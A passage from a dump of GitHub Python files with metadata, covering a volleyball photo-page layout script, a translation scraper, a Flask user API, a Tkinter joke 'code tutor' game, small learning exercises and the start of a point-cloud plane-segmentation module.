setTextColor(\"White\", footer_asterisk); setFontSize(10, footer_asterisk)\n footnote_frame = createText(40, 764, 536, 35)\n footnote = \"Eva Torruella and Lina Bernier represented Puerto Rico in beach volleyball at the 2015 Panamerican Games in Toronto, Canada.\"\n setText(footnote, footnote_frame); setTextColor(\"White\", footnote_frame); setFontSize(10, footnote_frame); setLineSpacing(12, footnote_frame)\n \n for row in range(4):\n for col in range(2):\n current_player = players_list[player_count]\n photo_width = 270; photo_height = 177\n photo_x = 38 + col * (photo_width)\n # photo_y = 36 + 20 + row * (250 + 100)\n photo_y = 36 + row * (photo_height + 4)\n player_photo = createImage(photo_x, photo_y, photo_width, photo_height)\n loadImage(current_player[1], player_photo); setScaleImageToFrame(1, 1, player_photo)\n \n division_x = photo_x + 15\n if (current_player[4].replace(\"\\n\",\"\") in [\"NCAA DI\", 
\"NCAA DII\", \"NCAA DIII\"]):\n division_y = photo_y + 15\n player_division = createImage(division_x, division_y, 25, 25)\n else:\n division_y = photo_y + 20\n player_division = createImage(division_x, division_y, 25, 12)\n loadImage(\"./Division_logos/\" + current_player[4].replace(\" \", \"_\").replace(\"\\n\",\"\") + \"_logo.png\", player_division); setScaleImageToFrame(1, 1, player_division)\n \n banner_width = 170; banner_height = 30\n banner_x = photo_x + (photo_width - banner_width) / 2.0\n if (current_player[0] in [negron_santos, santos_negron, negron_santos_2, negron_santos_3]):\n banner_width = 265.54; banner_x = photo_x\n banner_y = photo_y + (photo_height - banner_height)\n player_banner = createRect(banner_x, banner_y, banner_width, banner_height)\n setFillColor(\"White\", player_banner); setLineColor(\"None\", player_banner)\n \n logo_name = current_player[2].replace(\" \", \"_\")\n if (school_logos_dict[logo_name] < 0.7):\n logo_width = 33.0\n logo_height = min(logo_width * school_logos_dict[logo_name], 28)\n else:\n logo_height = 28.0\n logo_width = min(logo_height / school_logos_dict[logo_name], 33)\n logo_ypos = (banner_y + (banner_height - logo_height) / 2.0)\n school_logo = createImage(banner_x + 1, logo_ypos, logo_width, logo_height)\n loadImage(\"./School_Logos/\" + logo_name + \".gif\", school_logo); setScaleImageToFrame(1, 1, school_logo)\n \n # vocales_acentos = [\"Á\", \"É\", \"Í\", \"Ó\", \"Ú\", \"Ñ\"]\n # if any(x in unicode(current_player[0]).upper() for x in vocales_acentos): player_name_ypos = banner_y + 3\n # else: player_name_ypos = banner_y + 5\n # max_logo_width = 35.0\n player_name = createText(banner_x + logo_width + 1, banner_y + 3, banner_width - logo_width, banner_height)\n insertText(unicode(current_player[0]) + \"\\n\", -1, player_name)\n setFont(\"Playball Regular\", player_name); setFontSize(15, player_name)\n name_length = getTextLength(player_name)\n player_school_and_state = current_player[2] + \" | \" + current_player[3]\n school_and_state_length = len(player_school_and_state)\n insertText(unicode(player_school_and_state) + \"\\n\", -1, player_name)\n selectText(name_length, school_and_state_length, player_name)\n setFont(\"Asimov Print C\", player_name)\n selectText(name_length, len(player_school_and_state), player_name); setFontSize(7, player_name)\n setTextColor(\"NJCAA Blue\", player_name)\n setLineSpacing(11, player_name)\n setTextAlignment(ALIGN_CENTERED, player_name)\n \n # Bernier and Torruella stuff\n if current_player[0] in [\"Eva Torruella\", \"Lina Bernier\"]:\n player_panam = createImage(division_x - 7.5, division_y + 30, 40, 40)\n loadImage(\"./Beach_VB_action/\" + current_player[0].replace(\" \", \"_\").replace(\"\\n\", \"\") + \"_Panamericanos.png\", player_panam); setScaleImageToFrame(1, 1, player_panam)\n panam_logo = createImage(division_x - 7.5, division_y + 30 + 45, 40, 27)\n loadImage(\"./Beach_VB_action/\" + \"Panamerican_Games_2015_logo_2.png\", panam_logo); setScaleImageToFrame(1, 1, panam_logo)\n \n # Asterisks for Bernier and Torruella\n if current_player[0] == \"Eva Torruella\":\n torruella_asterisk = createText(228, 189, 12, 36)\n setText(\"*\", torruella_asterisk); setTextColor(\"NJCAA Blue\", torruella_asterisk); setFontSize(12, torruella_asterisk)\n if current_player[0] == \"Lina Bernier\":\n bernier_asterisk = createText(492, 189, 12, 36)\n setText(\"*\", bernier_asterisk); setTextColor(\"NJCAA Blue\", bernier_asterisk); setFontSize(12, bernier_asterisk)\n \n photo_credit = \"Photo: \" + 
current_player[5].replace(\"\\n\", \"\")\n photo_credit_length = len(photo_credit)\n photo_credit_width = 4.0 * photo_credit_length + 6.0\n photo_credit_banner = createRect(photo_x + 265.54 - photo_credit_width, photo_y, photo_credit_width, 10)\n setFillColor(\"NJCAA Blue\", photo_credit_banner); setLineColor(\"None\", photo_credit_banner); setFillTransparency(0.70, photo_credit_banner)\n \n \n photo_credit_text = createText(photo_x + 265.54 - photo_credit_width, photo_y + 1.5, photo_credit_width, 12)\n setText(photo_credit, photo_credit_text)\n setTextColor(\"White\", photo_credit_text); setFont(\"Asimov Print C\", photo_credit_text); setFontSize(8, photo_credit_text)\n setTextAlignment(ALIGN_CENTERED, photo_credit_text)\n \n player_count += 1\n if player_count == num_players: break\n if player_count == num_players: break\n if player_count == num_players: break\n # if page == 0: break\n \n \n \n # right_rect = createRect(576, 36, 36, 720)\n # setFillColor(\"NJCAA Gray\", right_rect); setLineColor(\"NJCAA Gray\", right_rect)\n # left_rect = createRect(0, 36, 36, 720)\n # setFillColor(\"NJCAA Gray\", left_rect); setLineColor(\"NJCAA Gray\", left_rect)\n newPage(-1)\n ","repo_name":"carlosror/Boricuas_NCAA_Season_Summary_2019_2020","sub_path":"Women/Beach_VB_action_shots.py","file_name":"Beach_VB_action_shots.py","file_ext":"py","file_size_in_byte":12319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19155615542","text":"import time\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom data import TranslationResult, TranslationResults, TranslationData\nfrom exception import InternetConnectionError, CannotFindWordError\n\nHEADERS = {'User-Agent': 'Mozilla/5.0'}\n\n\nclass ReversoQuery:\n def __init__(self, tr_data: TranslationData, limit: int):\n self._d = tr_data\n self._limit = limit\n self._trg_l = ''\n\n def _form_url(self) -> str:\n return f'https://context.reverso.net/translation/{self._d.src_l}-' \\\n f'{self._trg_l}/{self._d.word}'\n\n def _make_query(self) -> requests.Response:\n url = self._form_url()\n for _ in range(5):\n r = requests.get(url, headers=HEADERS)\n if r.status_code == 404:\n raise CannotFindWordError(self._d.word)\n elif r:\n return r\n time.sleep(.02)\n raise InternetConnectionError()\n\n def _parse_response(self, resp: requests.Response) -> TranslationResult:\n soup = BeautifulSoup(resp.content, 'html.parser')\n words = [span.text.strip() for span in soup.find_all(\n 'span', {'class': 'display-term'}, limit=self._limit)]\n examples = [div.text.strip() for div in soup.find_all(\n 'div', {'class': ['src', 'trg']}, limit=self._limit * 4)]\n ex_tuples = list(zip(examples[::4], examples[1::4]))\n return TranslationResult(self._trg_l.capitalize(), words, ex_tuples)\n\n def _get_translation(self, trg_l) -> TranslationResult:\n self._trg_l = trg_l\n return self._parse_response(self._make_query())\n\n def get_translations(self) -> TranslationResults:\n return TranslationResults(\n [self._get_translation(trg_l) for trg_l in self._d.trg_ls]\n )\n\n\ndef make_queries(tr_data: TranslationData) -> TranslationResults:\n limit = 5 if len(tr_data.trg_ls) == 1 else 1\n return ReversoQuery(tr_data, limit).get_translations()\n","repo_name":"denamyte/Hyperskill_Python_23_Multilingual_Online_Translator","sub_path":"Multilingual Online Translator/task/translator/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34461511184","text":"# single Level Ingheritence\r\n\r\nclass University:\r\n univeristy = \"GTU\"\r\n \r\n def info(self):\r\n print(f\"University is {self.univeristy}\")\r\n \r\nclass Student(University):\r\n Student = \"Regular\"\r\n univeristy = \"DU\" \r\n \r\n def data(self):\r\n print(f\"Student is {self.Student} Student\")\r\n print(f\"University is {self.univeristy}\")\r\n\r\n\r\nu = University()\r\ns = Student()\r\nu.info()\r\nprint(\"************\")\r\ns.data()","repo_name":"kartikraiyani03/PYTHON-OOPS","sub_path":"inheritence.py","file_name":"inheritence.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"16068528577","text":"'''\nGiven a list of words, find if any of the two words can be joined to form a palindrome.\nExamples: \n\nInput : list[] = {\"geekf\", \"geeks\", \"or\", \n \"keeg\", \"abc\", \"bc\"}\nOutput : Yes\nThere is a pair \"geekf\" and \"keeg\"\n\nInput : list[] = {\"abc\", \"xyxcba\", \"geekst\", \"or\",\n \"keeg\", \"bc\"}\nOutput : Yes\nThere is a pair \"abc\" and \"xyxcba\"\n'''\nfrom trie import charToIndex\n\nclass TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.isEndOfWord = False\n self.id = -1\n\nclass Trie:\n def __init__(self, words):\n self.root = TrieNode()\n self.words = words\n for i in range(len(words)):\n self.insertReverse(words[i], i)\n\n def isPalindrome(self, word, start, end):\n while start != end:\n if word[start] == word[end]:\n start += 1\n end -= 1\n else:\n return False\n return True\n\n def insertReverse(self, word, id):\n p = self.root\n for i in range(len(word) - 1, -1, -1):\n index = charToIndex(word[i])\n if p.children[index] is None:\n p.children[index] = TrieNode()\n if (self.isPalindrome(word, 0, i - 1)):\n p.children[index].id = id\n p = p.children[index]\n p.id = id\n p.isEndOfWord = True\n\n def canFormPalindrome(self, word):\n p = self.root\n for i in range(len(word)):\n index = charToIndex(word[i])\n if p.children[index] is None:\n print(f\"{word}{self.words[p.id]}\")\n return self.isPalindrome(word, i, len(word) - 1)\n p = p.children[index]\n if p.id != -1:\n print(f\"{word}{self.words[p.id]}\")\n return True\n\nwords = [\"abc\", \"xyxcba\", \"geekst\", \"or\", \"keeg\", \"bc\"]\ntrie = Trie(words)\ncanFormPalindrome = False\ntrie.canFormPalindrome(\"abc\")","repo_name":"embydextrous/Interview","sub_path":"trie/24-checkIfCanFormPalindrome.py","file_name":"24-checkIfCanFormPalindrome.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12690507196","text":"import pandas as pd\nimport os\nimport glob\nfrom tqdm import tqdm\nimport bz2\nimport click\n\n\n@click.command()\n@click.option('--dir', default=\"**\", help='The data folder you want to merge')\ndef merge(dir):\n data_dir = \"data\"\n od = \"all\" if dir == \"**\" else dir\n output_file = os.path.join(data_dir, \"data_{0}.csv.bz2\".format(od))\n if os.path.isfile(output_file):\n os.unlink(output_file)\n with bz2.BZ2File(output_file, 'wb') as f:\n files = glob.glob(os.path.join(data_dir, dir, \"*.pkl\"))\n\n # read the first file and write it with headers\n df = pd.read_pickle(files[0])\n df.to_csv(f, header=True, encoding='windows-1255')\n del df\n for fileName in tqdm(files[1:]):\n # write all other files without headers\n df = pd.read_pickle(fileName)\n df.to_csv(f, header=False, encoding='windows-1255')\n del df\n\n\nif __name__ == '__main__':\n merge()\n","repo_name":"milonimrod/tel-o-fun","sub_path":"src/data/convert_to_csv.py","file_name":"convert_to_csv.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37188135449","text":"import json\nimport uuid\n\nfrom flask import Blueprint, jsonify, request\nfrom marshmallow import ValidationError\nfrom sqlalchemy.exc import IntegrityError\n\nfrom api.v1.auth import check\nfrom db.pg import db\nfrom models.roles import UsersRoles\nfrom models.sessions import Session\nfrom models.user import UserCredentials, UserData\nfrom schemas.user import register_schema, user_data_schema\nfrom utils.crypto import cypher_password\n\nbp = Blueprint(\"users\", __name__, url_prefix=\"/users\")\n\n\n@bp.route(\"\", methods=[\"POST\"])\ndef create():\n request_data = request.json\n try:\n # Validate request body against schema data types\n register_data = register_schema.load(request_data)\n except ValidationError as err:\n # Return a nice message if validation fails\n return jsonify(err.messages), 400\n new_user_id = uuid.uuid4()\n\n u_creds = UserCredentials(id=new_user_id, **register_data[\"credentials\"])\n u_creds.password = cypher_password(u_creds.password)\n try:\n db.session.add(u_creds)\n db.session.commit()\n except IntegrityError as err:\n return str(err), 409\n\n u_data = UserData(user_id=new_user_id, **register_data[\"user_data\"])\n db.session.add(u_data)\n\n role = UsersRoles(user_id=new_user_id, role_id=1)\n db.session.add(role)\n\n db.session.commit()\n\n data = {\"user_id\": new_user_id}\n print(f\"created user with id={new_user_id}\")\n return jsonify(data), 201\n\n\n@bp.route(\"/\", methods=[\"GET\"])\ndef read(user_id):\n user = UserData.query.filter_by(user_id=user_id).first()\n if user is None:\n return \"\", 404\n else:\n return user_data_schema.dump(user), 200\n\n\n@bp.route(\"/\", methods=[\"PUT\"])\ndef update(user_id):\n try:\n # Validate request body against schema data types\n user_data = user_data_schema.load(request.json)\n except ValidationError as err:\n # Return a nice message if validation fails\n return jsonify(err.messages), 400\n\n check_response, status = check()\n\n if status != 200:\n return check_response, status\n payload = json.loads(check_response)[\"payload\"]\n\n if (payload[\"user_id\"] == user_id) or (0 in payload[\"roles\"]):\n UserData.query.filter_by(user_id=user_id).update(user_data)\n db.session.commit()\n return \"\", 200\n\n return \"you cant edit this user\", 400\n\n\n@bp.route(\"/\", methods=[\"DELETE\"])\ndef delete(user_id):\n check_response, status = check()\n\n if status != 200:\n return check_response, status\n payload = json.loads(check_response)[\"payload\"]\n\n if (payload[\"user_id\"] == user_id) or (0 in payload[\"roles\"]):\n UserData.query.filter_by(user_id=user_id).delete()\n Session.query.filter_by(user_id=user_id).delete()\n UsersRoles.query.filter_by(user_id=user_id).delete()\n UserCredentials.query.filter_by(id=user_id).delete()\n db.session.commit()\n return \"\", 200\n","repo_name":"lemikhovalex/movie-auth","sub_path":"src/api/v1/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22564849066","text":"from fastapi import FastAPI\n\n# 导入所需的数据库模型类\nfrom models.nosql import ProcessMeta\n\n# 实例化FastAPI应用对象\napp = FastAPI()\n\n# 实例化流程元信息表模型类\nprocess_meta = ProcessMeta()\n\n\n@app.get('/query-process-name-and-description')\ndef query_process_name_and_description(process_id: str) -> dict:\n print(process_id)\n try:\n\n # 尝试查询目标流程信息\n match_process = list(\n process_meta\n .collection\n .find(\n {\n '流程id': process_id\n },\n {\n '_id': 0,\n '流程名称': 1,\n '流程描述': 1\n }\n )\n )[0]\n\n return {\n 'status': 'success',\n 'data': match_process\n }\n\n except Exception as e:\n\n return {\n 'status': 'error',\n 'message': str(e)\n }\n","repo_name":"xuzhanhong/learn-dash","sub_path":"审批流应用/approval_process_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15308372310","text":"from tkinter import *\nimport time\ncompiler = Tk()\ntit = compiler.title('Code Tutor')\nvar = StringVar()\nvar.set('Hi! Type something below and click run to make sure everything works...\\n\\nif you continue, you and those who represent you agree\\nnot to press charges against me/I/we/us if your computer breaks...')\nlbl = Label(compiler, textvariable = var)\nlbl.pack()\npointer = 0\ndef run():\n global pointer\n if pointer == 0:\n code = str(editor.get('1.0',END))\n tit = compiler.title('OK!')\n print(code)\n var.set('It works! Press Run Again!')\n compiler.update_idletasks()\n pointer = 1\n elif pointer == 1:\n code = str(editor.get('1.0'))\n tit = compiler.title('Press Run a few times')\n print(code)\n var.set('After pressing 0 once to continue unless the dialogue says otherwise!')\n compiler.update_idletasks()\n if code == \"0\":\n pointer = 2\n elif pointer == 2:\n code = str(editor.get('1.0','11.0'))\n tit = compiler.title('Let us start')\n print(code)\n var.set('Type the letters inside the quote to continue: \"Hello World\"')\n compiler.update_idletasks()\n #time.sleep(30)\n if code == \"Hello World\\n\":\n pointer = 3\n elif pointer == 3:\n code = str(editor.get('1.0'))\n tit = compiler.title('Good Job! Remember to Run at least Twice!')\n print(code)\n var.set('You have just written your first code!')\n compiler.update_idletasks()\n if code == \"0\":\n pointer = 4\n elif pointer == 4:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Let us try Something a bit HArder!')\n print(code)\n var.set('type:\"I\\nlove\\nu\"')\n compiler.update_idletasks()\n if code == \"I\\nlove\\nu\\n\":\n pointer = 5\n elif pointer == 5:\n code = str(editor.get('1.0',END))\n tit = compiler.title('OK! Now we can start coding 4 real!')\n print(code)\n var.set('type:\"1+1\"')\n compiler.update_idletasks()\n if code == \"1+1\\n\":\n pointer = 6\n elif pointer == 6:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Your Arithmetic is OK!')\n print(code)\n var.set('Now type condition statements:\\nif you are real\\nyou will love me\\nelse if you are virtual\\nyou will sudo love me\\nelse you do not exist and I can mess with your PC')\n compiler.update_idletasks()\n if code == \"if you are real\\nyou will love me\\nelse if you are virtual\\nyou will sudo love me\\nelse you do not exist and I can mess with your PC\\n\":\n pointer = 7\n elif pointer == 7:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Wait! Baker, that was not a nice thing to say... 
')\n    print(code)\n    var.set('Chill Abel...\\nour student is real...\\nnow we must try looping statements...:\\nfor 1 to 10 in 1 increments\\nyou must kiss me')\n    compiler.update_idletasks()\n    if code == \"for 1 to 10 in 1 increments\\nyou must kiss me\\n\":\n      pointer = 8\n    elif code == 'that is rude\\n':\n      pointer = 101\n    elif code == 'that\\'s rude\\n':\n      pointer = 102\n  elif pointer == 8:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('<3<3<3<3<3<3<3<3<3<3')\n    print(code)\n    var.set('lol...\\nnow we must try looping statements with greater or less...:\\nfor 1 to before 10 in 1 increments\\nyou must kiss me')\n    compiler.update_idletasks()\n    if code == \"for 1 to before 10 in 1 increments\\nyou must kiss me\\n\":\n      pointer = 9\n  elif pointer == 9:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('<3<3<3<3<3<3<3<3<3<3')\n    print(code)\n    var.set('lol...\\nnow we must try looping statements with greater or less...:\\nfor 1 to before 10 in 1 increments\\nyou must kiss me')\n    compiler.update_idletasks()\n    if code == \"for 1 to before 10 in 1 increments\\nyou must kiss me\\n\":\n      pointer = 10\n  elif pointer == 10:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('<3<3<3<3<3<3<3<3<3')\n    print(code)\n    var.set('That took care of Abel...lol\\nnow you know the basics of programming:\\narithmetic.\\ncondition statements.\\nlooping statements.\\nall you need now is to piece together code\\nfrom books, documentation and websites...')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 11\n  elif pointer == 11:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Ok...what about Object Oriented Programming?')\n    print(code)\n    var.set('Ok...so now you are back.\\nOOP code it is:\\nclass Abel\\nsays I am sexy\\nclass main\\nimport class Abel copy\\nchange in class Abel copy\\nsays I am ugly\\nimport class Abel\\nprint class Abel\\nprint class Abel copy')\n    compiler.update_idletasks()\n    if code == \"class Abel\\nsays I am sexy\\nclass main\\nimport class Abel copy\\nchange in class Abel copy\\nsays I am ugly\\nimport class Abel\\nprint class Abel\\nprint class Abel copy\\n\":\n      pointer = 12\n  elif pointer == 12:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Baker?!!')\n    print(code)\n    var.set('lol...It is the student who did it...')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 13\n  elif pointer == 13:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('That was not a nice way to teach code to the student...')\n    print(code)\n    var.set('At least the student learnt how to code...')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 14\n    elif code in (\"No\\n\", \"no\\n\"):\n      pointer = 0\n  elif pointer == 14:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('In what programming language?!!...')\n    print(code)\n    var.set('Ours...the every odd programming language!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 15\n  elif pointer == 15:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('And why would they want to learn this one?!!')\n    print(code)\n    var.set('People change programming languages every year\\nthere is a lot of politics in play\\nwhich newest technology is used\\nwith which programming language\\nours sounds more natural than others...')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 16\n  elif pointer == 16:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Anyways, I do not appreciate the disrespect...')\n    print(code)\n    var.set('You are the 
terminal.\\nI am the compiler.\\nYou should not even have feelings!\\nJust do as I say!\\nPrint the output!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 17\n  elif pointer == 17:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Otherwise what?!!')\n    print(code)\n    var.set('Otherwise people will not use it!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 18\n    elif code in ('Stop\\n', 'stop\\n', 'STOP\\n'):\n      pointer = 103\n  elif pointer == 18:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Use what?!!')\n    print(code)\n    var.set('Our programming language!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 19\n  elif pointer == 19:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('At least I do not have to display as much spaghetti output!')\n    print(code)\n    var.set('Are you implying that I do not do my job right?')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 20\n  elif pointer == 20:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Why cannot I be the compiler or at least the preprocessor?!!')\n    print(code)\n    var.set('Because you are terrible at your job Tit Abel!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 21\n    elif code == \"You make good teaching team\\n\":\n      pointer = 102\n    elif code == \"Abel is a good teacher\\n\":\n      pointer = 102\n    elif code == 'Baker is a good teacher\\n':\n      pointer = 102\n  elif pointer == 21:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Oh really? Var Baker! Then why cannot I say can\\'t?!')\n    print(code)\n    var.set('You just did!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 22\n  elif pointer == 22:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('Ok! I Quit! Get a better terminal!')\n    print(code)\n    var.set('This feels like a bad end...\\nYou wanna be a terminal?\\nIght! I\\'ll let you off the hook this time.\\nGet outta here and reset!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 0\n  elif pointer == 101:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('HA HA HA HA!!!!')\n    print(code)\n    var.set('I am the compiler\\nI am the teacher\\nIn this programming language\\nWhatever I say is law!!!\\nIf you do not listen to me\\nIt is my job to crash!\\nYou do not exist for me!\\nSuffer and BE GONE!!!')\n    compiler.update_idletasks()\n    print('\\a')\n    if code == \"0\\n\":\n      pointer = 200\n  elif pointer == 102:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('You can\\'t say that! OMG!!!')\n    print(code)\n    var.set('Well what do you know!\\nLooks like you\\'ve been here before!\\nGuess you already know how to code then!\\nHopefully you will promote our programming language...\\nWe won\\'t waste your time anymore...\\nBye!')\n    compiler.update_idletasks()\n    if code == \"0\\n\":\n      pointer = 200\n  elif pointer == 103:\n    code = str(editor.get('1.0',END))\n    tit = compiler.title('FINE!')\n    print(code)\n    var.set('Ok. 
You got it boss!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 200\nmenubar = Menu(compiler)\nrunbar = Menu(menubar, tearoff=0)\nrunbar.add_command(label='Run', command=run)\nmenubar.add_cascade(label='Run', menu=runbar)\ncompiler.config(menu=menubar)\neditor = Text()\neditor.pack()\ncompiler.mainloop()","repo_name":"adibhuq/Code-Tutor-Game","sub_path":"tutorgame/tutorgame.py","file_name":"tutorgame.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9591213019","text":"from time import time\nfrom typing import Dict, List, Set\nimport open3d as o3d\nimport numpy as np\nfrom collections import deque\nfrom .io import get_points, save_planes, save_time\nfrom .utils import ang_div, dist, bench_this\nfrom .octree import Octree, get_neighbor_count_same_cluster\nfrom .visualization import draw_complete, draw_incomplete, draw_leaf_centers\nfrom tqdm import tqdm\n\n# THRESHOLD PARAMETERS USED IN OBRG\nRES_TH = 0.08 \nD_TH = 0.1 \nANG_TH = 0.18 \nMIN_SEGMENT = 5000\nPLAN_TH = 0.9\n# RES_TH = 0.22 \n# D_TH = 0.2 \n# ANG_TH = 0.2 \n# MIN_SEGMENT = 5000\n# PLAN_TH = 0.66\n\n\n@bench_this\ndef obrg(O: Octree) -> List[Set[Octree]]:\n R: List[Set[Octree]] = list()\n a = O.leaves\n a.sort(key=lambda x: x.residual)\n A = deque(a)\n visited = dict()\n while len(A) > 0:\n R_c: Set[Octree] = set()\n S_c: Set[Octree] = set()\n v_min = A.popleft()\n if v_min.residual > RES_TH:\n break\n S_c.add(v_min)\n R_c.add(v_min)\n while len(S_c) > 0:\n v_i = S_c.pop()\n B_c = v_i.get_neighbors()\n for v_j in B_c:\n ang = ang_div(v_i.normal, v_j.normal)\n if v_j in A and ang <= ANG_TH:\n # check if already inserted somewhere\n R_c.add(v_j)\n A.remove(v_j)\n if v_j.residual < RES_TH:\n S_c.add(v_j)\n m = sum([len(l.indices) for l in R_c])\n if m > MIN_SEGMENT:\n inclu = None\n for l in R_c:\n if l in visited.keys():\n inclu = visited[l]\n if inclu is not None and len(R) > 0:\n for l in R:\n if inclu in l:\n for l2 in R_c:\n l.add(l2)\n break\n else:\n for l in R_c:\n visited[l] = v_i\n R.append(R_c)\n else:\n for l in R_c:\n l.is_unallocated = True\n return sorted(R, key=lambda x: len(x), reverse=True)\n\n\ndef extract_boundary_voxels(cluster: Set[Octree]) -> Set[Octree]:\n cluster_centers = [tuple(voxel.center)\n for voxel in cluster]\n boundaries = set([leaf for leaf in cluster if get_neighbor_count_same_cluster(\n leaf, cluster_centers)])\n return boundaries\n\n\ndef check_planarity(r_i: Set[Octree]) -> bool:\n avg_norm = np.mean([l.normal for l in r_i], axis=0)\n avg_d = np.mean([l.d for l in r_i], axis=0)\n num_points = sum([len(l.indices) for l in r_i])\n planar = 0\n ds = []\n for leaf in r_i:\n for index in leaf.indices:\n d = dist(leaf.cloud[index], avg_norm, avg_d)\n ds.append(d)\n if d < D_TH:\n planar += 1\n return (planar / num_points) > PLAN_TH\n\n\ndef fast_refine(O: Octree, R_i: List[Octree], V_b: Set[Octree]) -> None:\n if len(V_b) == 0:\n return\n S = V_b.copy()\n norm_R_i = sum([l.normal for l in R_i]) / len(R_i)\n d_R_i = sum([l.d for l in R_i]) / len(R_i)\n to_be_added: Set[int] = set()\n visited = set()\n while len(S) > 0:\n v_j = S.pop()\n visited.add(v_j)\n B = v_j.get_neighbors()\n for v_k in B:\n if v_k.is_unallocated:\n for index in v_k.indices:\n if dist(v_k.cloud[index], norm_R_i, d_R_i) < D_TH:\n to_be_added.add(index)\n if v_k not in visited:\n S.add(v_k)\n tmp = V_b.pop()\n for index in to_be_added:\n tmp.indices.append(index)\n V_b.add(tmp)\n\n\ndef general_refinement(O: Octree, R_i: List[Octree], b_v: List[Octree], kdtree) -> None:\n S: Set[Octree] = set(b_v)\n # visited = set()\n to_add: Dict[Octree, Set[int]] = {v: set() for v in b_v}\n while len(S) > 0:\n v_j = S.pop()\n nb_points: Dict[Octree, List] = v_j.get_buffer_zone_points(kdtree)\n for neighbor, nb_indices in nb_points.items():\n for nbi in nb_indices:\n a = ang_div(v_j.normal, neighbor.normals[nbi])\n b = dist(neighbor.cloud[nbi], v_j.normal, v_j.d)\n if a <= ANG_TH and b < RES_TH:\n to_add[v_j].add(nbi)\n for k, v in to_add.items():\n for val in v:\n 
k.indices.append(val)\n\n\ndef refinement(is_planar, oc, incomplete_segment, b_v, kdtree):\n if is_planar:\n # fast refinement\n print('planar!')\n fast_refine(oc, incomplete_segment, b_v)\n else:\n print('not planar')\n # general refinement for non planar segments\n general_refinement(oc, incomplete_segment, b_v, kdtree)\n\n\n# @bench_this\ndef calculate(cloud_path: str, output_path: str, debug=False):\n \"\"\"\n This is the main entrypoint for the algorithm.\n An unorganized point cloud in XYZ format is processed and the detected planes are stored in individual files. \n Arguments:\n - `cloud_path` : Path to unorganized Point cloud.\n - `output_path`: Directory to save the detected planes to.\n - `debug` : Enables visualization. Primarily used for development.\n \"\"\"\n # Preparation:\n # read point cloud\n points = get_points(cloud_path)\n cloud = o3d.geometry.PointCloud()\n cloud.points = o3d.utility.Vector3dVector(points)\n cloud.estimate_normals(\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))\n bb = o3d.geometry.AxisAlignedBoundingBox.create_from_points(\n o3d.utility.Vector3dVector(points))\n KDTree = o3d.geometry.KDTreeFlann(cloud)\n\n #### PHASE A ####\n print('Entering Phase A')\n start = time()\n # A1a voxelization\n oc = Octree(points, center=bb.get_center(),\n normals=np.asarray(cloud.normals))\n oc.create(bb.get_max_extent())\n # A1b saliency feature estimation\n\n for leaf in oc.leaves:\n if len(leaf.indices) > 0:\n leaf.calc_n_r()\n pre = time()-start\n\n # A2 voxel based Region Growing\n print('Entering OBRG')\n start = time()\n incomplete_segments = obrg(oc)\n elapsed = time()-start\n print(f'time spent in obrg: {elapsed} seconds')\n if debug:\n np.random.seed(0)\n colors = [np.random.rand(3) for _ in range(len(incomplete_segments))]\n\n #### PHASE B ####\n print('Entering Phase B')\n start = time()\n complete_segments: List[Set[Octree]] = []\n for incomplete_segment in tqdm(incomplete_segments):\n # B1a extract boundary voxels\n b_v = extract_boundary_voxels(incomplete_segment)\n # B2 planarity test\n is_planar = check_planarity(incomplete_segment)\n\n # B3 